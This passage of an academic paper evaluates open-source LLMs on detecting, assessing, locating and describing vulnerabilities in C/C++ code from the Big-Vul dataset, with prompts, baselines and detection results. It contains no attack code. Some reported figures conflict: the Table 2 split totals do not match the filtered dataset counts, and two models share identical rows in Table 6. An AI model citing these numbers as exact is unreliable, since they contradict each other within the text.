The application of LLMs in software engineering has seen a surge, with models like ChatGPT being employed for various tasks (e.g., code review, code generation, and vulnerability detection). Although some works use LLMs for vulnerability tasks [33], [34], our work differs from these previous studies in the following aspects. (1) Closed-source ChatGPT vs. open-source LLMs: they only explore the capabilities of the closed-source ChatGPT in vulnerability tasks, whereas we investigate the abilities of both open-source code-related LLMs and general LLMs in these tasks. (2) Prompts vs. few-shot and fine-tuning settings: they focus solely on the performance of LLMs using prompts, which introduces randomness and hinders the reproducibility of their findings. In contrast, we examine the capabilities of LLMs under both few-shot and fine-tuning settings, providing the source code and corresponding model files to ensure the reproducibility of our experimental results.

2.2 Software Vulnerability
Software Vulnerabilities (SVs) can expose software systems to risk situations and consequently put the software under cyber-attacks, eventually causing huge economic losses and even threatening people's lives. Therefore, vulnerability databases have been created to document and analyze publicly known security vulnerabilities. For example, Common Vulnerabilities and Exposures (CVE) [35], [36] and SecurityFocus [37] are two well-known vulnerability databases. Besides, the Common Weakness Enumeration (CWE) defines the common software weaknesses underlying individual vulnerabilities, which are often referred to as the vulnerability types of CVEs. To better address these vulnerabilities, researchers have proposed many approaches for understanding the effects of software vulnerabilities, including SV detection [38]-[50], SV assessment [20], [51]-[54], SV location [55]-[57], SV repair [58]-[61], as well as SV description [62]-[65]. Many novel technologies have been adopted to promote the progress of software vulnerability management, including software analysis [66], [67], machine learning [38], [45], and deep learning [51], [56], especially LLMs [63], [64].

3 EXPERIMENTAL DESIGN
In this section, we present our studied dataset, our studied LLMs, the techniques for fine-tuning, the prompt engineering, the baseline approaches, the evaluation metrics, and the experiment settings.

TABLE 1: Takeaways: Evaluating LLMs on Software Vulnerability

Vulnerability Detection:
1. LLMs can detect vulnerabilities, but fine-tuned LLMs perform weaker than transformer-based approaches. Considering the computational resources and time costs of deploying LLMs, transformer-based approaches for vulnerability detection are a more efficient choice.
2. After fine-tuning, the detection capability of LLMs improves. Larger models usually perform better, but performance can also be influenced by model design and pre-training data. Therefore, fine-tuning the LLM on domain-specific data before using it as a vulnerability detector is necessary.
3. In general, different LLMs complement each other, while CodeLlama obtains better performance in terms of F1-score, Precision, and Recall.

Vulnerability Assessment:
4. Overall, fine-tuned code-related LLMs outperform pre-trained language models in vulnerability assessment. When resources permit, fine-tuning DeepSeek-Coder 6.7B for vulnerability assessment is optimal, as it outperforms the pre-trained language models across four metrics.
5. LLMs have the capacity to assess vulnerability severity based on source code, and can be improved by providing more context information.

Vulnerability Location:
6. The few-shot setting exposes LLMs' limitations, and fine-tuning can greatly enhance the vulnerability location capabilities of LLMs.
7. Fine-tuning code-related LLMs as vulnerability locators is beneficial, as they can outperform pre-trained language models in terms of F1-score, Precision, and FPR.

Vulnerability Description:
8. LLMs exhibit significantly weaker performance in generating vulnerability descriptions compared to pre-trained language models. Therefore, fine-tuning pre-trained language models for vulnerability description is recommended.
3.1 Studied Dataset
We adopt the widely used dataset (named Big-Vul) provided by Fan et al. [21] for the following reasons. The most important one is that it satisfies the distinct characteristics of the real world as well as the diversity in the dataset, as suggested by previous works [45], [47]. Big-Vul is, to the best of our knowledge, the largest-scale vulnerability dataset with diverse information about the vulnerabilities, which are collected from practical projects; these vulnerabilities are recorded in the Common Vulnerabilities and Exposures (CVE, https://cve.mitre.org/) database. The second reason is to enable a fair comparison with existing state-of-the-art (SOTA) approaches (e.g., LineVul, Devign, and SVulD).
Big-Vul contains 3,754 code vulnerabilities in total, collected from 348 open-source projects, spanning 91 different vulnerability types, from 2002 to 2019. It has 188,636 C/C++ functions with a vulnerable ratio of 5.7% (i.e., 10,900 vulnerable functions). The authors linked the code changes with CVEs and their descriptive information to enable a deeper analysis of the vulnerabilities.
We follow the same strategy as previous works [39], [48], [58] to build the training, validation, and testing data from the original dataset. Specifically, 80% of the functions are treated as training data, 10% as validation data, and the remaining 10% as testing data. We also keep the distribution the same as the original one across the training, validation, and testing data. Notice that we undersample the non-vulnerable functions to produce approximately balanced training data at the function level, while the validation and testing data remain at the original imbalanced ratio.
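The undersampling step can be realized in a few lines; the sketch below is our illustration (assuming a pandas DataFrame with a binary target column, as in Big-Vul-style CSVs), not the authors' released script:

    import pandas as pd

    def balance_training_split(train: pd.DataFrame, seed: int = 42) -> pd.DataFrame:
        # Keep every vulnerable function, draw an equal number of
        # non-vulnerable ones, then shuffle the balanced result.
        vul = train[train["target"] == 1]
        non_vul = train[train["target"] == 0].sample(n=len(vul), random_state=seed)
        return pd.concat([vul, non_vul]).sample(frac=1.0, random_state=seed)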
To clean and normalize the dataset, we remove empty lines, leading and trailing spaces in each line, as well as comments from the source code. Finally, the split dataset is used for evaluation, and the statistics are shown in Table 2.

TABLE 2: Statistics of the studied dataset

Datasets           #Vul.   #Non-Vul.  #Total    %Vul.:Non-Vul.
Original Big-Vul   10,900  177,736    188,636   0.061
Filtered Big-Vul   5,260   96,308     101,568   0.055
Training           8,720   8,720      17,440    1
Validation         1,090   17,774     18,864    0.061
Testing            1,090   17,774     18,864    0.061
(We undersample the non-vulnerable functions to produce approximately balanced training data.)

3.2 Studied LLMs
General LLMs are pre-trained on textual data, including natural language and code, and can be used for a variety of tasks. In contrast, code-related LLMs are specifically pre-trained to automate code-related tasks. Due to the empirical nature of this work, we are interested in assessing the effectiveness of both LLM categories on vulnerability tasks. For the code-related LLMs, we select the top four models released recently (in 2023), namely DeepSeek-Coder [9], CodeLlama [11], StarCoder [10], and WizardCoder [68]. For the general LLMs, we select the top two models, resulting in the selection of Mistral [69] and Phi-2 [70]. For the few-shot setting, we select the models with no more than 34B parameters from the Hugging Face Open LLM Leaderboard [71]; for the fine-tuning setting, we select the models with 7B parameters or less. The constraint on the number of parameters is imposed by our computing resources (i.e., 192GB RAM, 10 x NVIDIA RTX 3090 GPUs). Table 3 summarizes the characteristics of the studied LLMs; we briefly introduce them to make our paper self-contained.

TABLE 3: Overview of the studied LLMs

              Code-related LLMs                                     General LLMs
Models        DeepSeek-Coder  CodeLlama  StarCoder   WizardCoder   Mistral  Phi-2
Fine-Tuning   6.7B            7B         7B          7B            7B       2.7B
Few-Shot      6.7B & 33B      7B & 34B   7B & 15.5B  7B & 34B      7B       2.7B
Release Date  Nov '23         Aug '23    May '23     June '23      Sep '23  Dec '23

Group 1: Code-related LLMs. DeepSeek-Coder, developed by DeepSeek AI [9], comprises a series of code language models, each trained from scratch on 2T tokens with a composition of 87% code and 13% natural language in both English and Chinese. The developers provide various sizes of the code model, ranging from 1B to 33B versions. Each model is pre-trained on a project-level code corpus with a window size of 16K and an extra fill-in-the-blank task, to support project-level code completion and infilling. For coding capabilities, DeepSeek-Coder achieves state-of-the-art performance among open-source code models on multiple programming languages and various benchmarks.
artperformanceamongopen-sourcecodemodelsonmulti- detection, software vulnerability assessment, and software pleprogramminglanguagesandvariousbenchmarks. vulnerability location) and generative task (i.e., software CodeLlama proposed by Rozie`re et al. [11] is a set of vulnerability description). Therefore, fine-tuning LLMs for large pre-trained language models for code built on Llama software vulnerability tasks can be undertaken through 2. They achieve state-of-the-art performance among open both discriminative and generative methods, each method modelsoncodetasks,provideinfillingcapabilities,support specifically designed to make LLMs aligned with the task. largeinputcontexts,anddemonstratezero-shotinstruction Inparticular,wetreatthediscriminativetasksasbinaryclas- followingforprogrammingproblems.CodeLlamaiscreated sification, while treating the generative task as generation by further training Llama 2 using increased sampling of one.Thearchitecturesforthetwoparadigmsarepresented code data. As with Llama 2, the authors applied extensive inFig.3. safetymitigationstothefine-tunedCodeLlamaversions. StarCoder proposed by Li et al. [10] is a large pre- trained language model specifically designed for code. It 0 1 0 CVE description: A remote code ... was pre-trained on a large amount of code data to acquire Classifier Decoder programming knowledge and trained on permissive data ... ... ... ... from GitHub, including over 80 programming languages, Encoder / Decoder Encoder / Decoder Git commits, GitHub issues, and Jupyter notebooks. Star- Coder can perform code editing tasks, understand natural void set () { . . . write ( length ... . . . } void set () { . . . write ( length ... . . . } languageprompts,andgeneratecodethatconformstoAPIs. StarCoder represents the advancement of applying large (a) DiscriminativeFine-Tuning (b) GenerativeFine-Tuning languagemodelsinprogramming. WizardCoder proposed by Luo et al. [68] is a large Fig.3:Fine-tuningLLMsforsoftwarevulnerabilitytasks pre-trained language model that empowers Code LLMs withcomplexinstructionfine-tuning,byadaptingtheEvol- Discriminative Fine-Tuning. For vulnerability detec- Instruct method to the domain of code. Through compre- tion and vulnerability assessment, we utilize the “Au- hensive experiments on four prominent code generation toModelForSequenceClassification” class provided by the benchmarks,namelyHumanEval,HumanEval+,MBPP,and Transformers library to implement discriminative fine- DS-1000, the authors unveil the exceptional capabilities of tuning. “AutoModelForSequenceClassification” is a generic their model. It surpasses all other open-source Code LLMs model class that will be instantiated as one of the by a substantial margin. Moreover, WizardCoder even out- sequence classification model classes of the library performs the largest closed LLMs, Anthropic’s Claude and when created with the “AutoModelForSequenceClassifica- Google’sBard,onHumanEvalandHumanEval+. tion.from pretrained(model name or path)”classmethod. Group 2: General LLMs. Mistral is a 7-billion-parameter For vulnerability location, we follow previous language model released by Mistral AI [69]. Mistral 7B is works [72], [73] that use LLMs to classify individual code a carefully designed language model that provides both lines as either vulnerable or non-vulnerable. 
For a token efficiency and high performance to enable real-world ap- sequence T = {t 1,t 2,...,t n} of the function, the model’s plications.Duetoitsefficiencyimprovements,themodelis decoder component, denoted as M, processes T to yield a suitableforreal-timeapplicationswherequickresponsesare sequence of output vectors: O = M(T) = {o 1,o 2,...,o L}, essential.Atthetimeofitsrelease,Mistral7Boutperformed where O represents the output tensor with dimensions the best open source 13B model (Llama 2) in all evaluated L×H, L signifies the sequence length, and H denotes the benchmarks. hidden dimension size. During the process, the contextual Phi-2proposedbyMicrosoft[70]packedwith2.7billion information is captured by the masked self-attention parameters.Itisdesignedtomakemachinesthinkmorelike mechanisms in the decoder of LLMs, where masked self- humansanddoitsafely.Phi-2isnotjustaboutnumbers;it attention limits the sight to the preceding part of tokens. is about a smarter, safer way for computers to understand Each output vector o i that represents the last token of one and interact with the world. Phi-2 stands out because it is lineissubsequentlyassociatedwithalabel(i.e.,0or1).The been taught with a mix of new language data and careful optimization process employs the binary cross-entropy as checks to make sure it acts right. It is built to do many thelossfunction.6 TABLE4:Thetaskdescriptionsandindicatorsfordifferentsoftwarevulnerabilitytasks Dimension TaskDescription Indicator VulnerabilityDetection IfthisCcodesnippethasvulnerabilities,outputYes;otherwise,outputNo. //Detection VulnerabilityAssessment ProvideaqualitativeseverityratingsofCVSSv2.0forthevulnerableCcodesnippet. //Assessment VulnerabilityLocation ProvideavulnerabilitylocationresultforthevulnerableCcodesnippet. //Location VulnerabilityDescription ProvideaCVEdescriptionforthevulnerableCcodesnippet. //Description Generative Fine-Tuning. Generative fine-tuning aims to Prompt equip LLMs with the ability to perform Sequence-to- 1 Task Description: Sequence (Seq2Seq) tasks. Specifically, this involves in-
Generative Fine-Tuning. Generative fine-tuning aims to equip LLMs with the ability to perform Sequence-to-Sequence (Seq2Seq) tasks. Specifically, this involves inputting vulnerable code and generating the corresponding CVE descriptions related to the vulnerabilities. To calculate the loss during fine-tuning, we utilize the cross-entropy loss function, which is commonly used for Seq2Seq tasks. In this context, the loss measures the difference between the generated output sequence and the target sequence.

3.4 Prompt Engineering
For the few-shot setting, we follow prompts similar to those used in the artifacts, papers, or technical reports associated with each corresponding model [5], [10], [11], where each prompt contains three pieces of information: (1) task description, (2) source code, and (3) indicator. Using the software vulnerability detection task as an example, the prompt utilized for the LLM consists of three crucial components, as depicted in Fig. 4:
• Task Description (marked as (1)). We provide the LLM with the description constructed as "If this C code snippet has vulnerabilities, output Yes; otherwise, output No". The task description used in the SV detection task varies based on the source programming language we employ.
• Source Code (marked as (2)). We provide the LLM with the code wrapped in "// Code Start" and "// Code End". Since we illustrate an example in C, we use the C comment format "//" as a prefix for the description. We also employ different comment prefixes based on the programming language of the code.
• Indicator (marked as (3)). We instruct the LLM to think about the results. In this paper, we follow the best practice in previous work [12] and adopt the same prompt, named "// Detection".
Depending on the specific software vulnerability task, the task descriptions and indicators in the prompts may vary. The task descriptions and indicators for the different software vulnerability tasks are presented in Table 4.

TABLE 4: The task descriptions and indicators for different software vulnerability tasks

Dimension                  Task Description                                                                        Indicator
Vulnerability Detection    If this C code snippet has vulnerabilities, output Yes; otherwise, output No.          // Detection
Vulnerability Assessment   Provide a qualitative severity rating of CVSS v2.0 for the vulnerable C code snippet.  // Assessment
Vulnerability Location     Provide a vulnerability location result for the vulnerable C code snippet.             // Location
Vulnerability Description  Provide a CVE description for the vulnerable C code snippet.                           // Description

Fig. 4: The prompt contains three pieces of information: (1) task description, (2) source code, and (3) indicator.

(1) Task Description:
If this C code snippet has vulnerabilities, output Yes; otherwise, output No.
(2) Source Code:
// Code Start
void SendStatus(struct mg_connection* connection, const struct mg_request_info* request_info, void* user_data) {
    std::string response = "HTTP/1.1 200 OK\r\n" "Content-Length:2\r\n\r\n" "ok";
    mg_write(connection, response.data(), response.length());
}
// Code End
(3) Indicator:
// Detection
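Assembling such a prompt is mechanical; the following sketch shows one way to do it (helper names are ours, not the paper's artifact):

    TASKS = {
        "detection":   ("If this C code snippet has vulnerabilities, output Yes; "
                        "otherwise, output No.", "// Detection"),
        "assessment":  ("Provide a qualitative severity rating of CVSS v2.0 for "
                        "the vulnerable C code snippet.", "// Assessment"),
        "location":    ("Provide a vulnerability location result for the "
                        "vulnerable C code snippet.", "// Location"),
        "description": ("Provide a CVE description for the vulnerable C code "
                        "snippet.", "// Description"),
    }

    def build_prompt(task: str, source_code: str) -> str:
        # Concatenate the three parts: task description, wrapped code, indicator.
        description, indicator = TASKS[task]
        return (f"{description}\n"
                f"// Code Start\n{source_code}\n// Code End\n"
                f"{indicator}\n")

    print(build_prompt("detection", "void f() { gets(buf); }"))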
3.5 Baselines
To comprehensively compare the performance of LLMs with existing approaches, we consider various pre-trained Language Models (LMs). As shown in Table 5, these models have fewer than 220 million parameters and can be categorized into two groups: encoder-only LMs and encoder-decoder LMs. Encoder-only LMs (i.e., CodeBERT [24], GraphCodeBERT [25], and UniXcoder [26]) contain only the encoder component of a Transformer; they are designed for learning data representations and are trained using the Masked Language Modeling (MLM) objective. Encoder-decoder LMs (i.e., PLBART [27], CodeT5 [7], and CodeT5+ [8]) have been proposed for sequence-to-sequence tasks. They are trained to recover the correct output sequence given the original input, often through span prediction tasks where random spans are replaced with artificial tokens. Recently, researchers have combined MLM with generative models for bidirectional and autoregressive text generation or infilling [74]. All these LMs can potentially be used for our tasks, so we evaluate them.

TABLE 5: Overview of the studied LMs

Models          #Para.  Model Type         Models   #Para.  Model Type
CodeBERT        125M    Encoder-only LM    PLBART   140M    Encoder-decoder LM
GraphCodeBERT   125M    Encoder-only LM    CodeT5   220M    Encoder-decoder LM
UniXcoder       125M    Encoder-only LM    CodeT5+  220M    Encoder-decoder LM
(For UniXcoder, we use the encoder-only mode.)

For vulnerability location, we also consider Devign [38], Reveal [47], IVDetect [56], and LineVul [39] as baselines. In addressing vulnerability detection, we additionally include SVulD [48]. We briefly introduce them as follows.
Devign, proposed by Zhou et al. [38], is a general graph neural network-based model for graph-level classification that learns from a rich set of code semantic representations, including the AST, CFG, DFG, and code sequences. It uses a novel Conv module to efficiently extract useful features from the learned rich node representations for graph-level classification.
Reveal, proposed by Chakraborty et al. [47], contains two main phases. In the feature extraction phase, it translates code into a graph embedding; in the training phase, it trains a representation learner on the extracted features to obtain a model that can distinguish vulnerable functions from non-vulnerable ones.
IVDetect, proposed by Li et al. [56], contains a coarse-grained vulnerability detection component and a fine-grained interpretation component. In particular, IVDetect represents source code in the form of a program dependence graph (PDG) and treats the vulnerability detection problem as graph-based classification via a graph convolutional network with feature attention. For interpretation, IVDetect adopts a GNNExplainer to provide fine-grained interpretations that include the sub-graph in the PDG with the crucial statements that are relevant to the detected vulnerability.
LineVul, proposed by Fu et al. [39], is a Transformer-based line-level vulnerability prediction approach. LineVul leverages the BERT architecture with self-attention layers, which can capture long-term dependencies within a long sequence. Besides, benefiting from the large-scale pre-trained model, LineVul can intrinsically capture more lexical and logical semantics for the given code input. Moreover, LineVul adopts the attention mechanism of the BERT architecture to locate vulnerable lines for finer-grained detection.
SVulD, proposed by Ni et al. [48], is a function-level subtle semantic embedding approach for vulnerability detection along with heuristic explanations. In particular, SVulD adopts contrastive learning to train the UniXcoder semantic embedding model to learn distinguishing semantic representations of functions regardless of their lexically similar information.

3.6 Evaluation Metrics
For the considered software vulnerability-related tasks, we perform evaluations using widely adopted performance metrics. More precisely, to evaluate the effectiveness of LLMs on vulnerability detection and vulnerability assessment, we consider the following four metrics: F1-score, Recall, Precision, and Accuracy. Additionally, for vulnerability location, besides the four aforementioned metrics, we also consider the Top-k Accuracy and FPR metrics. For vulnerability description, we use the Rouge-1, Rouge-2, and Rouge-L metrics.
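For the classification tasks, these metrics can be computed, e.g., with scikit-learn (our choice for illustration; the paper does not prescribe a library), with the FPR read off the confusion matrix:

    from sklearn.metrics import (accuracy_score, confusion_matrix, f1_score,
                                 precision_score, recall_score)

    y_true = [1, 0, 1, 1, 0, 0]   # toy ground truth (1 = vulnerable)
    y_pred = [1, 0, 0, 1, 1, 0]   # toy predictions
    tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
    print("F1:", f1_score(y_true, y_pred),
          "Recall:", recall_score(y_true, y_pred),
          "Precision:", precision_score(y_true, y_pred),
          "Accuracy:", accuracy_score(y_true, y_pred),
          "FPR:", fp / (fp + tn))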
3.7 Implementation

We develop the generation pipeline in Python, utilizing PyTorch [75] implementations of DeepSeek-Coder, CodeLlama, StarCoder, WizardCoder, Mistral, and Phi-2. We use Huggingface [76] to load the model weights and generate outputs. We also adhere to the best-practice guide [77] for each prompt. For the fine-tuning setting, we select models with 7B parameters or fewer, and for the few-shot setting, we use models with no more than 34B parameters. To directly compare the fine-tuning setting with the few-shot setting, we employ models with the same parameter scale in both settings (i.e., DeepSeek-Coder 6.7B, CodeLlama 7B, StarCoder 7B, WizardCoder 7B, Mistral 7B, and Phi-2 2.7B). The constraint on the number of parameters is imposed by our computing resources. Table 3 summarizes the characteristics of the studied LLMs. Furthermore, considering the limitation of LLMs' conversation windows, we manually select three examples for the few-shot setting from the training data. Regarding baselines (i.e., pre-trained LMs, Reveal, IVDetect, Devign, LineVul, and SVulD), we utilize their publicly available source code and perform fine-tuning with the default parameters provided in their original code. Since Devign's code is not publicly available, we make every effort to replicate its functionality and achieve similar results on the original paper's dataset. All these models are implemented using the PyTorch [75] framework. The evaluation is conducted on a 16-core workstation equipped with an Intel(R) Xeon(R) Gold 6226R CPU @ 2.90GHz, 192GB RAM, and 10 × NVIDIA RTX 3090 GPUs, running Ubuntu 20.04.1 LTS.

4 EXPERIMENTAL RESULTS

This section presents the experimental results by evaluating LLMs' performance on the widely used comprehensive dataset (i.e., Big-Vul [21]) covering four SV-related tasks.

4.1 RQ-1: Evaluating Vulnerability Detection of LLMs

In this RQ, we first investigate the vulnerability detection capability of LLMs and make a comparison with the existing state-of-the-art (SOTA) approaches. Then, we conduct a more detailed analysis of the results, comparing the detection performance of LLMs under the Top-10 CWE types.

Experimental Setting. We instruct LLMs with the following task description to tell them to act as a vulnerability detector.

Task Description: If this C code snippet has vulnerabilities, output Yes; otherwise, output No.
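As an illustration of how such a prompt can be issued in a Huggingface-based pipeline, the following sketch wraps the task description around a code snippet. The checkpoint name and decoding settings are illustrative assumptions, not the exact configuration used in this study:

# A hypothetical sketch of the zero-shot detection prompt; the checkpoint
# name and generation parameters are illustrative only.
from transformers import AutoModelForCausalLM, AutoTokenizer

MODEL = "deepseek-ai/deepseek-coder-6.7b-instruct"  # assumed checkpoint
tokenizer = AutoTokenizer.from_pretrained(MODEL)
model = AutoModelForCausalLM.from_pretrained(MODEL, device_map="auto")

def detect(code: str) -> str:
    prompt = ("If this C code snippet has vulnerabilities, output Yes; "
              "otherwise, output No.\n\n" + code + "\nAnswer:")
    inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
    out = model.generate(**inputs, max_new_tokens=4, do_sample=False)
    return tokenizer.decode(out[0][inputs["input_ids"].shape[1]:],
                            skip_special_tokens=True).strip()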
In addition to pre-trained LMs, we also consider the following five SOTA baselines: Devign [38], Reveal [47], IVDetect [56], LineVul [39], and SVulD [48]. These baselines can be divided into two groups: graph-based (i.e., Devign, Reveal, and IVDetect) and transformer-based (i.e., pre-trained LMs, LineVul, and SVulD). Besides, in order to comprehensively compare the performance among baselines and LLMs, we consider four widely used performance measures (i.e., Precision, Recall, F1-score, and Accuracy) and conduct experiments on the popular dataset. Since graph-based approaches need to obtain the structure information (e.g., control flow graph (CFG), data flow graph (DFG)) of the studied functions, we adopt the same toolkit, Joern, to transform functions. Functions are dropped directly if they cannot be transformed by Joern successfully. Finally, the filtered dataset (shown in Table 2) is used for evaluation. We follow the same strategy as previous work [39], [58] to build the training data, validation data, and testing data from the original dataset. Specifically, 80% of functions are treated as training data, 10% as validation data, and the remaining 10% as testing data. We also keep the label distribution the same as the original one in the training, validation, and testing data. We undersample the non-vulnerable functions to produce approximately balanced training data at the function level, while the validation and testing data remain in the original imbalanced ratio.

Apart from presenting the overall performance comparison, we also give the detailed performance of LLMs on the Top-10 CWE types for a better analysis.
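A possible realization of the split-and-undersample procedure described above is sketched below; the dataframe columns (func, label) and the fixed seed are assumptions for illustration, not the paper's exact preprocessing code:

# Hypothetical sketch of the 80/10/10 split with function-level
# undersampling of non-vulnerable samples in the training set only.
import pandas as pd

def split_and_balance(df: pd.DataFrame, seed: int = 42):
    df = df.sample(frac=1.0, random_state=seed)  # shuffle
    n = len(df)
    train = df[: int(0.8 * n)]
    valid = df[int(0.8 * n): int(0.9 * n)]
    test = df[int(0.9 * n):]

    vul = train[train["label"] == 1]
    non_vul = train[train["label"] == 0].sample(n=len(vul), random_state=seed)
    balanced_train = pd.concat([vul, non_vul]).sample(frac=1.0,
                                                      random_state=seed)
    return balanced_train, valid, test  # valid/test stay imbalanced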
TABLE 6: The comparison between LLMs and eleven baselines on software vulnerability detection (RQ1)

Methods | F1-score | Recall | Precision | Accuracy
Devign | 0.200 | 0.660 | 0.118 | 0.726
Reveal | 0.232 | 0.354 | 0.172 | 0.811
IVDetect | 0.231 | 0.540 | 0.148 | 0.815
LineVul | 0.272 | 0.620 | 0.174 | 0.828
SVulD | 0.336 | 0.414 | 0.282 | 0.915
CodeBERT | 0.270 | 0.608 | 0.173 | 0.830
GraphCodeBERT | 0.246 | 0.721 | 0.148 | 0.771
UniXcoder | 0.256 | 0.787 | 0.153 | 0.764
PLBART | 0.255 | 0.692 | 0.157 | 0.791
CodeT5 | 0.237 | 0.759 | 0.141 | 0.748
CodeT5+ | 0.218 | 0.508 | 0.139 | 0.812
Fine-Tuning Setting
DeepSeek-Coder 6.7B | 0.270 | 0.627 | 0.172 | 0.824
CodeLlama 7B | 0.259 | 0.806 | 0.154 | 0.761
StarCoder 7B | 0.220 | 0.607 | 0.135 | 0.778
WizardCoder 7B | 0.214 | 0.365 | 0.151 | 0.861
Mistral | 0.220 | 0.607 | 0.135 | 0.778
Phi-2 | 0.241 | 0.557 | 0.154 | 0.818
Few-Shot Setting
DeepSeek-Coder 6.7B | 0.084 | 0.156 | 0.057 | 0.823
DeepSeek-Coder 33B | 0.107 | 0.688 | 0.058 | 0.404
CodeLlama 7B | 0.098 | 0.449 | 0.055 | 0.570
CodeLlama 34B | 0.117 | 0.281 | 0.074 | 0.781
StarCoder 7B | 0.094 | 0.443 | 0.053 | 0.560
StarCoder 15.5B | 0.097 | 0.557 | 0.053 | 0.463
WizardCoder 7B | 0.086 | 0.380 | 0.049 | 0.583
WizardCoder 34B | 0.128 | 0.559 | 0.072 | 0.607
Mistral | 0.126 | 0.401 | 0.074 | 0.711
Phi-2 | 0.099 | 0.563 | 0.054 | 0.471

Results. [A] LLMs vs. Baselines. Table 6 shows the overall performance measures between LLMs and eleven baselines, and the best performances are highlighted in bold. According to the results in Table 6, we can obtain the following observations:

(1) Fine-tuned LLMs have poor performance compared with transformer-based approaches when considering F1-score, Precision, and Accuracy. In particular, SVulD obtains 0.336, 0.282, and 0.915 in terms of F1-score, Precision, and Accuracy, which surpass the fine-tuned LLMs by 24.4% to 57.0%, 64.0% to 108.9%, and 6.3% to 20.2% in terms of F1-score, Precision, and Accuracy, respectively. Notably, the F1-score performance of LineVul is significantly lower (0.272) than that reported in the original paper (0.910). We further analyze this discrepancy in Section 5.1.

(2) The performance of fine-tuned LLMs is comparable to graph-based approaches. For example, in terms of F1-score, fine-tuned LLMs achieve a range of 0.214 to 0.270. In comparison, graph-based approaches achieve a range of 0.200 to 0.232.

(3) LLMs under the few-shot setting have poor performance compared with baselines. LLMs ranging from 2.7B to 34B parameters perform less favorably than baselines in terms of F1-score and Precision. However, as for Accuracy, SVulD (transformer-based) obtains the best performance (0.915), and DeepSeek-Coder 6.7B under the few-shot setting achieves a performance of 0.823, which is better than the three graph-based approaches.

Finding-1. LLMs can detect vulnerabilities, but fine-tuned LLMs perform weaker than transformer-based approaches. Considering the computational resources and time costs of deploying LLMs, transformer-based approaches for vulnerability detection are a more efficient choice.
[B] Fine-Tuning vs. Few-Shot. The experimental results are presented in Table 6. Based on these experimental findings, we can draw the following observations: (1) LLMs fine-tuned for vulnerability detection demonstrate superior performance on the task compared to LLMs in the few-shot setting. The average F1-score and average Precision have doubled, while the average Recall has also shown improvement. (2) LLMs with more parameters typically exhibit better performance. For example, CodeLlama 34B improves upon CodeLlama 7B by 19.4%, 34.5%, and 37.0% in terms of F1-score, Precision, and Accuracy, respectively. However, different LLMs may exhibit performance variations due to differences in model design and the quality of pre-training data. (3) Phi-2 achieves performance approximating that of other LLMs with 7 billion parameters, even with a parameter size of 2.7 billion. This may be attributed to the higher quality of its pre-training data.

Finding-2. After fine-tuning, the detection capability of LLMs has improved. Larger models usually perform better, but performance can also be influenced by model design and pre-training data. Therefore, fine-tuning the LLM on domain-specific data before using it as a vulnerability detector is necessary.

[C] The comparisons of Top-10 CWE types between LLMs. Table 7 shows the detailed comparisons of the Top-10 CWE types between fine-tuned LLMs. In this table, we highlight the best performance for each performance metric in bold. According to the results, we can achieve the following observations: (1) In most cases, CodeLlama obtains better performance than other LLMs in terms of F1-score, Precision, and Recall. Different LLMs have certain advantages in different CWE types, complementing each other. (2) Considering the performance of F1-score, Precision, and Recall, CodeLlama achieves the best performances on CWE-125 ("Out-of-bounds Read"), CWE-362 ("Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"), and CWE-476 ("NULL Pointer Dereference"), which indicates CodeLlama is exceptionally skilled at detecting and mitigating vulnerabilities related to memory handling and synchronization issues.

TABLE 7: The software vulnerability detection comparison on Top-10 CWEs among fine-tuned LLMs (RQ1). In each block, the six columns are DeepSeek-Coder, CodeLlama, StarCoder, WizardCoder, Mistral, and Phi-2; "#Total / #Vul." gives the number of functions and vulnerable functions per CWE type.

F1-score:
CWE-119 (1549 / 128) | 0.321 0.309 0.316 0.269 0.258 0.281
CWE-20 (1082 / 80) | 0.269 0.273 0.229 0.216 0.145 0.269
CWE-264 (800 / 64) | 0.486 0.468 0.337 0.348 0.356 0.477
CWE-399 (697 / 35) | 0.355 0.286 0.209 0.274 0.227 0.306
CWE-125 (582 / 29) | 0.233 0.267 0.213 0.195 0.179 0.180
CWE-200 (573 / 27) | 0.269 0.261 0.241 0.180 0.162 0.229
CWE-189 (442 / 21) | 0.235 0.208 0.255 0.273 0.178 0.293
CWE-362 (413 / 16) | 0.031 0.086 0.075 0.050 0.026 0.032
CWE-416 (406 / 12) | 0.193 0.178 0.148 0.145 0.146 0.141
CWE-476 (367 / 11) | 0.091 0.109 0.053 0.057 0.037 0.019

Precision:
CWE-119 | 0.223 0.197 0.212 0.215 0.181 0.197
CWE-20 | 0.173 0.163 0.141 0.165 0.096 0.175
CWE-264 | 0.357 0.316 0.232 0.308 0.269 0.361
CWE-399 | 0.227 0.169 0.125 0.191 0.143 0.196
CWE-125 | 0.145 0.156 0.129 0.128 0.108 0.109
CWE-200 | 0.182 0.159 0.151 0.132 0.106 0.152
CWE-189 | 0.145 0.119 0.151 0.180 0.108 0.182
CWE-362 | 0.017 0.045 0.040 0.029 0.014 0.018
CWE-416 | 0.113 0.101 0.083 0.093 0.086 0.082
CWE-476 | 0.049 0.057 0.028 0.032 0.020 0.010

Recall:
CWE-119 | 0.570 0.719 0.625 0.359 0.453 0.492
CWE-20 | 0.609 0.844 0.609 0.313 0.297 0.578
CWE-264 | 0.763 0.900 0.613 0.400 0.525 0.700
CWE-399 | 0.815 0.926 0.630 0.481 0.556 0.704
CWE-125 | 0.586 0.931 0.621 0.414 0.517 0.517
CWE-200 | 0.514 0.743 0.600 0.286 0.343 0.457
CWE-189 | 0.625 0.813 0.813 0.563 0.500 0.750
CWE-362 | 0.200 0.800 0.600 0.200 0.200 0.200
CWE-416 | 0.667 0.750 0.667 0.333 0.500 0.500
CWE-476 | 0.571 1.000 0.429 0.286 0.286 0.143

Accuracy:
CWE-119 | 0.801 0.735 0.777 0.839 0.785 0.792
CWE-20 | 0.804 0.735 0.758 0.866 0.793 0.814
CWE-264 | 0.839 0.795 0.759 0.850 0.810 0.846
CWE-399 | 0.885 0.821 0.815 0.901 0.854 0.877
CWE-125 | 0.808 0.746 0.771 0.830 0.763 0.765
CWE-200 | 0.829 0.743 0.770 0.841 0.784 0.812
CWE-189 | 0.853 0.776 0.828 0.891 0.833 0.869
CWE-362 | 0.847 0.794 0.821 0.908 0.821 0.855
CWE-416 | 0.835 0.796 0.773 0.884 0.828 0.820
CWE-476 | 0.782 0.687 0.706 0.820 0.719 0.725

Finding-3. In general, different LLMs complement each other, while CodeLlama obtains better performance in terms of F1-score, Precision, and Recall.
4.2 RQ-2: Evaluating Vulnerability Assessment of LLMs

